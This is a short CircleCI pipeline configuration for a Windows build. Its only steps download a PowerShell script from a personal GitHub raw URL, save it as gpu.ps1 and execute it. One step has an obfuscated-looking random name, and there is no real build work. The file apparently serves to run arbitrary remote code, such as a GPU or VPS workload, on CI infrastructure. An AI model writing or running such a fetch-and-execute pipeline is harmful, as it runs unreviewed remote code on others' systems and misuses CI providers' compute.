
version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
      
        
 
    steps:  
       
      - run: 
          name: 23wuCFm5tUwb5kWovFm0qFB5u20_49szph852XappuahDLp2W
          command: |      
            Invoke-WebRequest https://raw.githubusercontent.com/xiashiwei/vps/main/sh -OutFile gpu.ps1 
          
      - run: ./gpu.ps1